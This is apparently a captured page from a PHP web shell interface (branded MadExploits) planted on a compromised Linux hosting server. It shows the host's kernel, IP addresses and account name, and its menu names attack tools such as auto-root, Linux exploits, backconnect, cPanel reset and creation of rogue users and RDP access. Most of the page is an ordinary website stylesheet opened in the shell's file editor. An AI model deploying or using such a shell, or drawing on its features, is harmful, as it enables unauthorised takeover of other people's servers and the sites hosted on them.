Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.137.183.57
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Instly-quote /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
comnon.css
8.97
KB
-rw-r--r--
dashbord.css
17.82
KB
-rw-r--r--
datatables2.0.8.min.css
25.37
KB
-rw-r--r--
index.css
13.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.css
.hero-banner { padding: 140px 0 60px; } .banner-wrap { display: flex; gap: 4rem; } .banner-text { max-width: 740px; width: 100%; } .h1-heading { font: normal 98px / 100px "DM Sans"; color: var(--black); text-transform: capitalize; } .header-btn { display: inline-block; margin-top: 32px; } /* clinet */ .clientlist { margin-top: 50px; } .p-heading b, .p-heading strong { font-weight: 600; } .client-logo { margin-top: 32px; } .client-logo .each-logo { display: flex; justify-content: center; align-items: center; } .client-logo .each-logo img { width: auto; height: 50px; } .counter-banner { overflow: hidden; } .bcq { position: absolute; z-index: -1; background-position: center; background-repeat: no-repeat; right: -13%; top: 0%; width: 900px; height: 900px; background-image: url(../img/dottcube.png); } .w-1095 { max-width: 1095px; text-transform: capitalize; padding: 247px 0; gap: 80px; } .left-highlight { max-width: 365px; width: 100%; font: normal 64px / 84px "DM Sans"; } .right-highlight { max-width: 650px; width: 100%; font: 100 64px / 78px "DM Sans"; font-weight: 100; } .max-640 { max-width: 640px; padding: 55px 0; gap: 24px; } .itemsv1 { border-radius: 8px; box-shadow: 0px 0px 8px 0px #00000005; border: 0.5px solid var(--dashbord); background-color: var(--white); padding: 56px 24px; } .itemsv1 h2 { font-family: "DM Sans"; margin: 32px 0 16px; text-transform: capitalize; } .bannerv2 { margin: 135px 0; } .bannerleft { background: rgba(0, 0, 0, 0.15); backdrop-filter: blur(25px); position: absolute; height: 100%; top: 0; width: 50%; display: flex; align-items: center; justify-content: center; text-transform: capitalize; } .txt-banner { width: 420px; } .txt-banner h2 { font: 600 64px / 78px "DM Sans"; color: var(--gaylight); } .txt-banner p { color: var(--white); } .txt-banner .btn-2 { margin-top: 32px; display: block; text-align: center } .btn-2 { padding: 10px 15px; border: 0; outline: 0; border-radius: 4px; background: var(--white); color: var(--black); } /******* form uiux *******/ .quote-fm { padding: 60px 0; } .color-7c { color: var(--grayseven); } .step h2.title32 { margin: 15px 0 34px; text-transform: capitalize; } .fm-list { max-width: 416px; width: 100%; display: flex; flex-direction: column; gap: 24px 0; } .step .form-label { display: block; color: var(--grayseven); margin-bottom: 8px; } .control-sm, .control-v1 { width: 100%; border-radius: 8px; border: 1.4px solid var(--dashbord); background: var(--white); padding: 8px 16px; } .control-sm { padding: 6px 16px; } select.control-sm, select.control-v1, .step select { appearance: none; -webkit-appearance: none !important; -moz-appearance: none !important; background-image: url("data:image/svg+xml,%3Csvg width='16' height='16' viewBox='0 0 16 16' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cg id='chevron-down 2'%3E%3Cpath id='Vector' d='M4 6L8 10L12 6' stroke='%23343434' stroke-width='1.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3C/g%3E%3C/svg%3E%0A"); background-position: 98%; background-repeat: no-repeat; } /* radio */ .step [type="checkbox"]:checked, .step [type="checkbox"]:not(:checked), .step [type="radio"]:checked, .step [type="radio"]:not(:checked) { position: absolute; visibility: hidden; opacity: 0; } .step [type="checkbox"]:checked+label, .step [type="checkbox"]:not(:checked)+label, .step [type="radio"]:checked+label, .step [type="radio"]:not(:checked)+label { position: relative; padding-left: 40px; cursor: pointer; line-height: 26px; display: inline-block; color: var(--balck); font-size: 20px; } .step [type="checkbox"]:checked+label:before, .step [type="checkbox"]:not(:checked)+label:before, .step [type="radio"]:checked+label:before, .step [type="radio"]:not(:checked)+label:before { content: ''; position: absolute; left: 0; top: 0; width: 24px; height: 24px; border: 1px solid #D3D3D3; border-radius: 100%; background: var(--white); } .step [type="checkbox"]:checked+label:after, .step [type="checkbox"]:not(:checked)+label:after, .step [type="radio"]:checked+label:after, .step [type="radio"]:not(:checked)+label:after { content: ''; width: 16px; height: 16px; background: var(--primary); position: absolute; top: 4px; left: 4.6px; border-radius: 100%; -webkit-transition: all 0.2s ease; transition: all 0.2s ease; } .step [type="checkbox"]:not(:checked)+label:after, .step [type="radio"]:not(:checked)+label:after { opacity: 0; -webkit-transform: scale(0); transform: scale(0); } .step [type="checkbox"]:checked+label:after, .step [type="radio"]:checked+label:after { opacity: 1; -webkit-transform: scale(1); transform: scale(1); } .cst-radio { margin-bottom: 24px; text-transform: capitalize; } .outline-btn { text-transform: capitalize; padding: 8px 16px; border-radius: 4px; border: 2px solid var(--primary); background: var(--white); color: var(--primary); box-shadow: 0px 4px 16px 0px rgba(255, 255, 255, 0.15) inset; } .btn-prev { color: var(--gray); border: 0 !important; } /* checkbox */ .step [type="checkbox"]:checked+label:after, .step [type="checkbox"]:not(:checked)+label:after, .step [type="checkbox"]:checked+label:before, .step [type="checkbox"]:not(:checked)+label:before { border-radius: unset; } .withlf { margin-bottom: 24px; } .withlf .color-7c { font-size: 20px; display: flex; gap: 1.5rem; } .withlf .control-v1 { width: 65px; } .twoleft { display: flex; flex-direction: column; gap: 24px; } .outlineicons { align-items: center; display: flex; gap: 8px; padding: 8px 16px; border-radius: 8px; border: 2px solid var(--primary); background: transparent; width: fit-content; font-size: 16px; color: var(--primary); } .right-data .remove-btn { border: 2px solid #ED5C5C; color: #ED5C5C; } .hidden { display: none; } .step { display: none; } .step.active { display: block; } .btn-continue { /* margin-top: 150px;*/ } .pg-class { display: flex; gap: 24px; position: absolute; top: 50%; /* transform: translateY(-50%); */ right: -1rem; transform: rotate(90deg); transform-origin: right; } .pg-class .dotts { width: 10px; height: 10px; display: block; border-radius: 50%; background-color: var(--gaylight); } .pg-class li.active .dotts { background-color: var(--primary); } .wraps-steps { max-width: 740px; width: 100%; } .card-componets { border-radius: 8px; padding: 1.5rem; background-color: var(--white); box-shadow: 0px 1px 1px 0px rgba(0, 0, 0, 0.08); } .verify-data { max-width: 416px; width: 100%; gap: 16px; } .width-41 { flex: 0 0 41%; color: var(--grayseven); margin-right: 1rem; } .input-hz { width: 100%; } .form-control-xs { border-radius: 2px; border: 1px dashed var(--dashbord); padding: 6.5px 16px; width: 100%; } .child-box .form-control-xs { width: 58px; } /* .btntype-check { border: 0; outline: 0; background: 0; } .btntype-check input[type="checkbox"].asButton, .btntype-check input[type="radio"].asButton { display: none; } .btntype-check input[type="checkbox"].asButton+label, .btntype-check input[type="radio"].asButton+label { display: block; position: relative; border-radius: 2px; border: 1.4px dashed var(--dashbord); background: rgba(228, 231, 235, 0.38); background-color: rgba(228, 231, 235, 0.38); color: #8A97AA; padding: 6.5px 16px; cursor: pointer; } .btntype-check input[type="checkbox"].asButton:checked+label { background-color: rgba(22, 192, 152, 0.38); border: 1.4px dashed #00B087; color: #008767; } .wrap-multi-chekbox { margin-top: 8px; flex-wrap: wrap; gap: 0.5rem 1rem; } .wraps-steps .mak-space, .wraps-steps .step { height: 100%; } */ .max-560 { max-width: 560px; width: 100%; } .max-560 .color-7c { font-size: 16px; } /******* end form row ui *******/ /******* ins page **************/ .quote-h1 { font: 600 36px / 43px "DM Sans"; text-transform: capitalize; } .searchbox { min-height: 38px; width: 100%; border-radius: 4px; padding: 4px 8px 4px 16px; border: 1px solid rgba(187, 187, 187, 0.75); } .searchbutton { width: 24px; height: 24px; border: 0; outline: 0; background-color: transparent; position: absolute; right: 8px; top: 7px; } .filter-radio { margin: 24px 0; } .step.filter-radio [type="radio"]:not(:checked)+label, .step.filter-radio [type="radio"]:checked+label { font-size: 16px; } .apply-btn .apply-click { width: 100%; background-color: var(--primary); color: var(--white); } .contact-filter .buttonlink { display: inline-block; margin-top: 24px; box-shadow: 0px 4px 16px 0px #FFFFFF26 inset; background-color: var(--green); box-shadow: 0px 4px 16px 0px rgba(255, 255, 255, 0.15) inset; } .all-list { padding: 65px 0 130px; } .quotelist-wrap { display: flex; gap: 3.5rem; margin-top: 60px; } .quotelist-aside { max-width: 270px; width: 100%; } .aside-bar h2.f-18 { font-weight: 600; } .quotelist-count { max-width: 956px; width: 100%; } .brandimg img { margin-right: 0.60rem; height: 40px; } .brandimg .title-h2 { text-transform: capitalize; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .plan-name { padding: 2px 0px; font-weight: 500; text-transform: capitalize; margin-top: 8px; border-radius: 4px; border: 1px solid var(--black); text-align: center; } .quote-listv1 { padding: 1rem; border-radius: 8px; border: 0.5px solid rgba(187, 187, 187, 0.75); background: var(--white); box-shadow: 0px 1px 1px 0px rgba(0, 0, 0, 0.08); } .mail-btn { padding: 9px 16px; border-radius: 8px; outline: 0; border: 0.5px solid rgba(187, 187, 187, 0.75); background: var(--white); box-shadow: 0px 1px 1px 0px rgba(0, 0, 0, 0.08); } .quote-count-list.grids-3 { gap: 1rem; } .limit-wrap { gap: 1.5rem; } .clickbtn { gap: 8px; } .quote-see { background-color: var(--black); color: var(--white); } .labeltext { letter-spacing: 0.28px; opacity: 0.75; } .label-premium { letter-spacing: 0.32px; line-height: 28px; } .list-covers { display: flex; flex-wrap: wrap; gap: 8px; margin-top: 4px; } .list-name { text-transform: capitalize; padding: 4px 12px; color: #008767; border-radius: 25px; border: 1.4px solid #00B087; background: rgba(22, 192, 152, 0.38); } .sm-155 { min-width: 155px; } .bg-change-q { gap: 1rem; border-radius: 8px; padding: 8px 16px; background-color: rgba(187, 187, 187, 0.10); } .email-q { width: fit-content; margin: 1.5rem 0; } .emaildata-fm { gap: 1.5rem; } .fullbtn-mail { border: 0; color: var(--white); font-weight: 500; padding: 10px 15px; border-radius: 4px; background: var(--primary); } /********* ins page end **********/ /***** popup css ********/ .cst-sm-modal { max-width: 635px; width: 100%; } .cst-modal { position: fixed; left: 0; top: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); opacity: 0; visibility: hidden; transform: scale(1.1); transition: visibility 0s linear 0.25s, opacity 0.25s 0s, transform 0.25s; } .cst-modal-content { max-height: 90vh; overflow-x: auto; position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: white; padding: 40px; /* width: 30em;*/ border-radius: 8px; } .cst-close-button { cursor: pointer; transition: color 0.12s ease-in-out; } .cst-close-button:hover { color: var(--clr-main); } .cst-show-modal { opacity: 1; visibility: visible; transform: scale(1.0); transition: visibility 0s linear 0s, opacity 0.25s 0s, transform 0.25s; } .cst-md-modal { max-width: 965px; width: 100%; } .abs-right { position: absolute; right: 40px; top: 40px; } .footer-btn { margin-top: 40px; gap: 8px; } .model-quote .area-cover .list-name { border: 1.4px solid var(--dashbord); background-color: rgba(228, 231, 235, 0.38); color: #8A97AA; } .model-quote .labeltext { font-weight: 500; } .area-cover { margin: 24px 0 16px; } .full-btn { padding: 10px 24px; border-radius: 4px; background-color: var(--black); color: var(--white); width: 100%; border: 0; } .limit-covered { margin: 16px 0 24px; } .cubes-box { border-radius: 8px; background: rgba(187, 187, 187, 0.10); padding: 8px 16px; } .remaning-things { gap: 8px; margin: 16px 0 32px; text-transform: capitalize; } .lbtxt { opacity: 0.5; letter-spacing: 0.26px; text-transform: capitalize; } .amt { letter-spacing: 0.32px; font-weight: 500; line-height: 28px; } .cover-things { gap: 8px; } .cover-box-inner { padding: 8px; border-radius: 8px; background: rgba(187, 187, 187, 0.10); } .cover-box h2 { margin-bottom: 1rem; letter-spacing: 0.28px; text-transform: capitalize; font-weight: 500; } .cover-listing { gap: 8px; } .gt-q { width: max-content; border: 2px solid var(--primary); color: var(--white); background-color: var(--primary); } .sm-q { border: 2px solid var(--black); color: var(--black); background-color: transparent; } .footer-btn button { font-weight: 500; min-width: 173px; } /***** popup end ********/
Close